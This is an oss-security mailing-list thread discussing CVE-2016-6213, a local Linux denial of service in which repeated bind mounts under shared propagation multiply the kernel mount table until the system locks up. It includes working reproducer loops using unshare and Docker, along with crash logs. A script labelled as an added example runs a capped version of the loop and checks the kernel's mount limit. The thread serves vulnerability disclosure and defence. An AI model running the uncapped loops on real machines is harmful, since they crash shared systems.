Message-ID: <4DCEEA06-5F41-4412-B7FC-F550DB74527C@nccgroup.trust>
Date: Fri, 15 Jul 2016 15:00:38 +0000
From: Jesse Hertz <Jesse.Hertz@...group.trust>
To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>
Subject: Re: cve request: local DoS by overflowing kernel mount table using shared bind mount
I can confirm that, crashed a VM last night with an almost identical command :)
> On Jul 15, 2016, at 10:35 AM, CAI Qian <caiqian@...hat.com> wrote:
>
> Also, it is exploitable without docker but with only user namespace enabled.
>
> $ unshare -r -m --propagation shared
> # for i in `seq 1 30`; do mount -o bind ~/src/ ~/des/; done
>
> Tested it on this large-memory machine. Consumed 1.5G memory to create 8388640
> entries in the mount table. Immediately afterwards, NMI watchdog/soft-lockup
> kicked in and the kernel is dead.
> CAI Qian
>
> $ unshare -m -r --propagation shared
> # for i in `seq 1 30`; do mount -o bind ~/src/ ~/des/; free -m; mount | wc -l ; done
> (all figures from free -m, in MiB; the Swap line was 4095 total / 0 used / 4095 free on every iteration)
>
> mount|wc -l    total    used      free  shared  buff/cache  available
>          34   128493     421    127672       8         399     127326
>          36   128493     421    127671       8         399     127325
>          40   128493     422    127671       8         399     127324
>          48   128493     423    127670       8         399     127324
>          64   128493     423    127669       8         399     127323
>          96   128493     424    127669       8         399     127322
>         160   128493     425    127668       8         399     127322
>         288   128493     426    127667       8         399     127321
>         544   128493     426    127667       8         399     127320
>        1056   128493     426    127666       8         400     127320
>        2080   128493     426    127665       8         400     127319
>        4128   128493     427    127664       8         401     127318
>        8224   128493     428    127662       8         403     127316
>       16416   128493     428    127658       8         406     127311
>       32800   128493     431    127648       8         413     127302
>       65568   128493     434    127631       8         428     127284
>      131104   128493     443    127594       8         456     127247
>      262176   128493     458    127521       8         513     127175
>      524320   128493     491    127374       8         627     127028
>     1048608   128493     559    127081       8         852     126734
>     2097184   128493     688    126496       8        1308     126150
>     4194336   128493     961    125314       8        2216     124968
>     8388640   128493    1506    122953       8        4033     122607
>
> Message from syslogd@...-x3755-02 at Jul 14 17:01:52 ...
> kernel:NMI watchdog: BUG: soft lockup - CPU#12 stuck for 23s! [mount:4250]
>
> Message from syslogd@...-x3755-02 at Jul 14 17:01:52 ...
> kernel:NMI watchdog: BUG: soft lockup - CPU#0 stuck for 22s! [NetworkManager:1971]
>
> Message from syslogd@...-x3755-02 at Jul 14 17:01:52 ...
> kernel:NMI watchdog: BUG: soft lockup - CPU#3 stuck for 23s! [systemd-journal:1749]
>               total        used        free      shared  buff/cache   available
> Mem:         128493        2600      118223           8        7669      117877
> Swap:          4095           0        4095
>
> Message from syslogd@...-x3755-02 at Jul 14 17:01:52 ...
> kernel:NMI watchdog: BUG: soft lockup - CPU#4 stuck for 23s! [irqbalance:1972]
>
> Message from syslogd@...-x3755-02 at Jul 14 17:01:52 ...
> kernel:NMI watchdog: BUG: soft lockup - CPU#14 stuck for 22s! [sendmail:2533]
>
> [ 5773.628802] NMI watchdog: BUG: soft lockup - CPU#12 stuck for 23s! [mount:4250]
> [ 5773.636139] Modules linked in: ipmi_ssif nfsd kvm_amd kvm auth_rpcgss nfs_acl ses lockd enclosure ipmi_devintf scsi_transport_sas irqbypass ipmi_si ibmpex ibmaem sg shpchp ipmi_msghandler i2c_piix4 k10temp pcspkr acpi_cpufreq grace sunrpc ip_tables xfs libcrc32c sd_mod sr_mod cdrom radeon i2c_algo_bit drm_kms_helper syscopyarea sysfillrect sysimgblt ata_generic fb_sys_fops ixgbe pata_acpi ttm e1000e lpfc drm mdio pata_serverworks dca aacraid libata ptp serio_raw bnx2 scsi_transport_fc pps_core i2c_core dm_mirror dm_region_hash dm_log dm_mod
> [ 5773.685984] CPU: 12 PID: 4250 Comm: mount Not tainted 4.7.0-rc7 #1
> [ 5773.692176] Hardware name: IBM IBM System x3755 -[71635RU]-/System Planar, BIOS IBM BIOS Version 1.04 -[C8E133AUS-1.04]- 08/31/2009
> [ 5773.704001] task: ffff8807f5968000 ti: ffff880731310000 task.ti: ffff880731310000
> [ 5773.711485] RIP: 0010:[<ffffffff8123ac38>] [<ffffffff8123ac38>] __lookup_mnt+0x58/0x80
> [ 5773.719535] RSP: 0018:ffff880731313dc0 EFLAGS: 00000282
> [ 5773.724862] RAX: ffff8807e0e75980 RBX: ffff8817b6e36420 RCX: 0000000000000012
> [ 5773.732005] RDX: ffff881780933d80 RSI: ffff8807fb7af500 RDI: ffff8817b6e36420
> [ 5773.739146] RBP: ffff880731313dc0 R08: 0000000000000000 R09: ffffe8ffdfd82ae0
> [ 5773.746293] R10: 0000000000001570 R11: 0000000000002ad9 R12: ffff8807fb7af500
> [ 5773.753428] R13: ffff881ff97835c0 R14: 0000000000000000 R15: 0000000000000000
> [ 5773.760574] FS: 00007fa36b919880(0000) GS:ffff88201fc00000(0000) knlGS:0000000000000000
> [ 5773.768663] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> [ 5773.774443] CR2: 00007f8bedaba000 CR3: 0000000fc9707000 CR4: 00000000000006e0
> [ 5773.781587] Stack:
> [ 5773.783615] ffff880731313de0 ffffffff8123ac77 ffff88178f268300 ffff88178f268180
> [ 5773.791116] ffff880731313e28 ffffffff8123b1bb ffff88178f268180 00000000ad5522bc
> [ 5773.798639] ffff881ff97835c0 ffff881fc90eb1a0 ffff880fc7d0a880 0000000000000000
> [ 5773.806168] Call Trace:
> [ 5773.808632] [<ffffffff8123ac77>] __lookup_mnt_last+0x17/0x80
> [ 5773.814402] [<ffffffff8123b1bb>] attach_recursive_mnt+0x10b/0x230
> [ 5773.820584] [<ffffffff8123b32f>] graft_tree+0x4f/0x60
> [ 5773.825737] [<ffffffff8123ca43>] do_mount+0xc33/0xdb0
> [ 5773.830887] [<ffffffff811f69af>] ? __kmalloc_track_caller+0x1af/0x250
> [ 5773.837424] [<ffffffff811afb71>] ? strndup_user+0x41/0x80
> [ 5773.842918] [<ffffffff811afa92>] ? memdup_user+0x42/0x70
> [ 5773.848328] [<ffffffff8123ced3>] SyS_mount+0x83/0xd0
> [ 5773.853403] [<ffffffff81003b12>] do_syscall_64+0x62/0x110
> [ 5773.858910] [<ffffffff816c6921>] entry_SYSCALL64_slow_path+0x25/0x25
> [ 5773.865364] Code: b2 00 48 8b 15 12 2e b2 00 48 8d 04 c2 48 8b 10 31 c0 48 85 d2 75 10 5d c3 48 39 72 18 74 21 48 8b 12 48 85 d2 74 15 48 8b 42 10 <48> 83 c0 20 48 39 c7 74 e5 48 8b 12 48 85 d2 75 eb 31 c0 5d c3
> [ 5780.883837] NMI watchdog: BUG: soft lockup - CPU#0 stuck for 22s! [NetworkManager:1971]
> [ 5780.891840] Modules linked in: ipmi_ssif nfsd kvm_amd kvm auth_rpcgss nfs_acl ses lockd enclosure ipmi_devintf scsi_transport_sas irqbypass ipmi_si ibmpex ibmaem sg shpchp ipmi_msghandler i2c_piix4 k10temp pcspkr acpi_cpufreq grace sunrpc ip_tables xfs libcrc32c sd_mod sr_mod cdrom radeon i2c_algo_bit drm_kms_helper syscopyarea sysfillrect sysimgblt ata_generic fb_sys_fops ixgbe pata_acpi ttm e1000e lpfc drm mdio pata_serverworks dca aacraid libata ptp serio_raw bnx2 scsi_transport_fc pps_core i2c_core dm_mirror dm_region_hash dm_log dm_mod
> [ 5780.940715] CPU: 0 PID: 1971 Comm: NetworkManager Tainted: G L 4.7.0-rc7 #1
> [ 5780.948798] Hardware name: IBM IBM System x3755 -[71635RU]-/System Planar, BIOS IBM BIOS Version 1.04 -[C8E133AUS-1.04]- 08/31/2009
> [ 5780.960609] task: ffff8817f9508000 ti: ffff8817f9ba8000 task.ti: ffff8817f9ba8000
> [ 5780.968089] RIP: 0010:[<ffffffff812253e3>] [<ffffffff812253e3>] path_init+0x2b3/0x340
> [ 5780.976037] RSP: 0018:ffff8817f9babc90 EFLAGS: 00000202
> [ 5780.981347] RAX: 0000000002000521 RBX: ffff8817f9babdb0 RCX: ffff8807f9853e00
> [ 5780.988478] RDX: ffffffff8221bbc8 RSI: 0000000000000041 RDI: ffff8817f9babdb0
> [ 5780.995608] RBP: ffff8817f9babcc0 R08: 000000000001b2c0 R09: ffff8807f9699180
> [ 5781.002732] R10: 0000000000000020 R11: 0000000000000020 R12: 0000000000000041
> [ 5781.009863] R13: ffff8807fbc9a01c R14: 000000007fffffff R15: ffff8817f9babdb0
> [ 5781.016988] FS: 00007f422f41d8c0(0000) GS:ffff8807ffc00000(0000) knlGS:0000000000000000
> [ 5781.025072] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> [ 5781.030818] CR2: 00007f8bed0c6fed CR3: 0000000ff898d000 CR4: 00000000000006f0
> [ 5781.037950] Stack:
> [ 5781.039969] ffff8807f926b140 0000000000000011 ffff8817f9babecc ffff8817f9babecc
> [ 5781.047430] 000000007fffffff ffff8817f9babdb0 ffff8817f9babda0 ffffffff81227391
> [ 5781.054891] 0000001c00000000 0000000003082263 ffffffff8159588d 0000000003082263
> [ 5781.062350] Call Trace:
> [ 5781.064799] [<ffffffff81227391>] path_openat+0x81/0x1370
> [ 5781.070202] [<ffffffff8159588d>] ? move_addr_to_user+0x8d/0xc0
> [ 5781.071838] NMI watchdog: BUG: soft lockup - CPU#3 stuck for 23s! [systemd-journal:1749]
> [ 5781.071872] Modules linked in: ipmi_ssif nfsd kvm_amd kvm auth_rpcgss nfs_acl ses lockd enclosure ipmi_devintf scsi_transport_sas irqbypass ipmi_si ibmpex ibmaem sg shpchp ipmi_msghandler i2c_piix4 k10temp pcspkr acpi_cpufreq grace sunrpc ip_tables xfs libcrc32c sd_mod sr_mod cdrom radeon i2c_algo_bit drm_kms_helper syscopyarea sysfillrect sysimgblt ata_generic fb_sys_fops ixgbe pata_acpi ttm e1000e lpfc drm mdio pata_serverworks dca aacraid libata ptp serio_raw bnx2 scsi_transport_fc pps_core i2c_core dm_mirror dm_region_hash dm_log dm_mod
> [ 5781.071876] CPU: 3 PID: 1749 Comm: systemd-journal Tainted: G L 4.7.0-rc7 #1
> [ 5781.071877] Hardware name: IBM IBM System x3755 -[71635RU]-/System Planar, BIOS IBM BIOS Version 1.04 -[C8E133AUS-1.04]- 08/31/2009
> [ 5781.071879] task: ffff8807f7906680 ti: ffff881ff8828000 task.ti: ffff881ff8828000
> [ 5781.071891] RIP: 0010:[<ffffffff812253db>] [<ffffffff812253db>] path_init+0x2ab/0x340
> [ 5781.071892] RSP: 0018:ffff881ff882ba88 EFLAGS: 00000202
> [ 5781.071893] RAX: 0000000002000521 RBX: ffff881ff882baf0 RCX: ffff881ff882bc30
> [ 5781.071894] RDX: ffff881ff882bc30 RSI: 0000000000000041 RDI: ffff881ff882baf0
> [ 5781.071895] RBP: ffff881ff882bab8 R08: 0000000000000000 R09: ffffffff812286ab
> [ 5781.071896] R10: ffff8807ff8032c0 R11: 0000000000000016 R12: 0000000000000041
> [ 5781.071897] R13: ffff8807f9e9601c R14: 0000000000000001 R15: 000000000000000a
> [ 5781.071898] FS: 00007f1f25f29880(0000) GS:ffff8807ffd80000(0000) knlGS:0000000000000000
> [ 5781.071900] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> [ 5781.071900] CR2: 00007f4ed9306000 CR3: 0000000ff97ba000 CR4: 00000000000006e0
> [ 5781.071901] Stack:
> [ 5781.071903] ffffffff810b3929 ffff881ff882baf0 ffff881ff882bc30 ffff881ff882bc30
> [ 5781.071905] 0000000000000001 000000000000000a ffff881ff882bae0 ffffffff81226ffb
> [ 5781.071906] ffff8807ff8032c0 0000000000000001 ffff8807f9e96000 ffff881ff882bbf0
> [ 5781.071907] Call Trace:
> [ 5781.071916] [<ffffffff810b3929>] ? ttwu_do_wakeup+0x19/0xe0
> [ 5781.071920] [<ffffffff81226ffb>] path_lookupat+0x1b/0x110
> [ 5781.071922] [<ffffffff81228c3f>] filename_lookup+0xaf/0x190
> [ 5781.071930] [<ffffffff8159de11>] ? __kmalloc_reserve.isra.35+0x31/0x90
> [ 5781.071933] [<ffffffff8159fbe1>] ? __alloc_skb+0xa1/0x2b0
> [ 5781.071936] [<ffffffff811f329b>] ? kmem_cache_alloc+0x18b/0x1f0
> [ 5781.071937] [<ffffffff812286ab>] ? getname_kernel+0x2b/0x110
> [ 5781.071939] [<ffffffff81228d4b>] kern_path+0x2b/0x30
> [ 5781.071948] [<ffffffff816642c5>] unix_find_other+0x45/0x240
> [ 5781.071951] [<ffffffff815a5d0a>] ? skb_copy_datagram_from_iter+0x5a/0x1f0
> [ 5781.071953] [<ffffffff81664fa1>] unix_dgram_sendmsg+0x451/0x690
> [ 5781.071956] [<ffffffff81596af8>] sock_sendmsg+0x38/0x50
> [ 5781.071957] [<ffffffff81597449>] ___sys_sendmsg+0x279/0x290
> [ 5781.071958] [<ffffffff811f3401>] ? kmem_cache_alloc_trace+0x101/0x210
> [ 5781.071960] [<ffffffff811f32e6>] ? kmem_cache_alloc+0x1d6/0x1f0
> [ 5781.071966] [<ffffffff812cd5d7>] ? selinux_file_alloc_security+0x37/0x60
> [ 5781.071968] [<ffffffff812cd5d7>] ? selinux_file_alloc_security+0x37/0x60
> [ 5781.071974] [<ffffffff812c7543>] ? security_file_alloc+0x33/0x50
> [ 5781.071981] [<ffffffff8121b3cf>] ? get_empty_filp+0xcf/0x1a0
> [ 5781.071983] [<ffffffff81597e54>] __sys_sendmsg+0x54/0x90
> [ 5781.071984] [<ffffffff81597ea2>] SyS_sendmsg+0
>
> ----- Original Message -----
>> From: "CAI Qian" <caiqian@...hat.com>
>> To: "Greg KH" <greg@...ah.com>
>> Cc: oss-security@...ts.openwall.com, cve-assign@...re.org
>> Sent: Thursday, July 14, 2016 12:15:02 PM
>> Subject: Re: [oss-security] Re: cve request: local DoS by overflowing kernel mount table using shared bind mount
>>
>> Maybe this is a better reproducer using docker. It is exploitable even with
>> user namespace enabled.
>>
>> # docker run -it -v /mnt/:/mnt/:shared --cap-add=SYS_ADMIN rhel7 /bin/bash
>>
>> # cat /proc/self/uid_map
>> 0 995 65536
>>
>> # cat /proc/self/gid_map
>> 0 992 65536
>>
>> (inside container) # for i in `seq 1 20`; do mount -o bind /mnt/1 /mnt/2; done
>> CAI Qian
>>
>> ----- Original Message -----
>>> From: "Greg KH" <greg@...ah.com>
>>> To: oss-security@...ts.openwall.com
>>> Cc: caiqian@...hat.com, cve-assign@...re.org
>>> Sent: Wednesday, July 13, 2016 6:45:00 PM
>>> Subject: Re: [oss-security] Re: cve request: local DoS by overflowing
>>> kernel mount table using shared bind mount
>>>
>>> On Wed, Jul 13, 2016 at 12:59:40PM -0400, cve-assign@...re.org wrote:
>>>>> It was reported that the mount table expands by a power-of-two
>>>>> with each bind mount command.
>>>>
>>>>> If the system is configured in the way that a non-root user
>>>>> allows bind mount even if with limit number of bind mount
>>>>> allowed, a non-root user could cause a local DoS by quickly
>>>>> overflow the mount table.
>>>>
>>>>> it will cause a deadlock for the whole system,
>>>>
>>>>>> form of unlimited memory consumption that is causing the problem
>>>>
>>>> Use CVE-2016-6213.
>>>
>>> A CVE for an "improperly configured system"? Huh? What distro has such
>>> a configuration set by default? This isn't a kernel bug, so what is
>>> this CVE classified as being "against"? It better not be against the
>>> Linux kernel...
>>>
>>> confused,
>>>
>>> greg k-h
>>>
>
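A bounded way to reproduce and check what the thread describes, as an added example (not code from the thread or from any of its participants): it runs the same bind-mount loop in a throwaway user and mount namespace with a hard cap on iterations, contrasts `--propagation shared` with `--propagation private`, and reads the per-namespace mount cap later added to the kernel (`fs.mount-max`, Linux 4.9 and later, default 100000). The growth formula is fitted to the counts posted above (each bind adds 2^(k-1) mounts, so K binds on top of BASE mounts give BASE + 2^K - 1; with BASE = 33 that reproduces every count in the run, including 8388640 after 23 binds). It assumes a util-linux `unshare` that accepts `--propagation` (2.27 or later); the temporary directory layout and the 12-iteration cap are choices made here, not something from the report.

```sh
#!/bin/sh
# Added example, not part of the oss-security thread: a bounded reproduction of
# the shared-propagation bind-mount blow-up plus the checks worth running first.
# Assumes util-linux unshare(1) with --propagation (2.27+) and mount(8); the
# temp-directory layout and the 12-iteration cap are choices made here.

# Growth model fitted to the counts in the posted run: with a shared root, bind
# number k re-attaches the target's whole peer group, so it adds 2^(k-1) mounts
# and K binds on top of BASE mounts leave BASE + 2^K - 1.  With BASE=33 this
# reproduces every count printed above (33 + 2^23 - 1 = 8388640).
expected_mounts() { # usage: expected_mounts BASE K
    echo $(( $1 + (1 << $2) - 1 ))
}

# Can this host run the live demo?  Needs unprivileged user namespaces (or
# root) and an unshare that accepts --propagation.
can_demo() {
    unshare -r -m --propagation shared true >/dev/null 2>&1
}

# Per-namespace mount cap added in Linux 4.9 (fs.mount-max, default 100000);
# on older kernels there is no limit, which is the condition in the report.
mount_max_limit() {
    if [ -r /proc/sys/fs/mount-max ]; then
        cat /proc/sys/fs/mount-max
    else
        echo "unlimited (no fs.mount-max; kernel older than 4.9)"
    fi
}

# demo_growth shared|private N: in a fresh user+mount namespace bind SRC onto
# DES N times and print "BEFORE AFTER" mount counts from /proc/self/mountinfo.
# N is capped at 12 (at most 4095 extra mounts) so the demo cannot turn into
# the DoS it illustrates.  The mounts disappear with the namespace.
demo_growth() {
    prop=$1; n=$2
    if [ "$n" -gt 12 ]; then
        echo "refusing N=$n: 2^N-1 mounts would be a self-inflicted DoS" >&2
        return 2
    fi
    work=$(mktemp -d) || return 1
    mkdir -p "$work/src" "$work/des"
    unshare -r -m --propagation "$prop" sh -c '
        work=$1; n=$2
        before=$(wc -l < /proc/self/mountinfo)
        i=0
        while [ "$i" -lt "$n" ]; do
            mount --bind "$work/src" "$work/des" || exit 1
            i=$((i + 1))
        done
        echo "$before $(wc -l < /proc/self/mountinfo)"
    ' sh "$work" "$n"
    rc=$?
    rmdir "$work/src" "$work/des" "$work" 2>/dev/null
    return $rc
}

# Stand-alone run: report the cap, then contrast shared with private propagation.
echo "fs.mount-max: $(mount_max_limit)"
if can_demo; then
    for prop in shared private; do
        if out=$(demo_growth "$prop" 6); then
            set -- $out
            echo "$prop: $1 mounts before, $2 after 6 binds" \
                 "(shared model: $(expected_mounts "$1" 6); private: $(( $1 + 6 )))"
        else
            echo "$prop: live demo failed" >&2
        fi
    done
else
    echo "skipping live demo: no unprivileged user namespaces or no unshare --propagation"
fi
```

With shared propagation the "after" count is BASE + 63 for 6 binds; with private propagation it is BASE + 6, which is the whole difference between a bind-mount loop that is harmless and one that exhausts kernel memory. On a kernel with `fs.mount-max` the loop stops with EINVAL/ENOSPC once the namespace reaches the cap instead of taking the machine down; on a kernel without it, the only defences are keeping unprivileged user namespaces disabled and not handing containers shared volumes together with CAP_SYS_ADMIN.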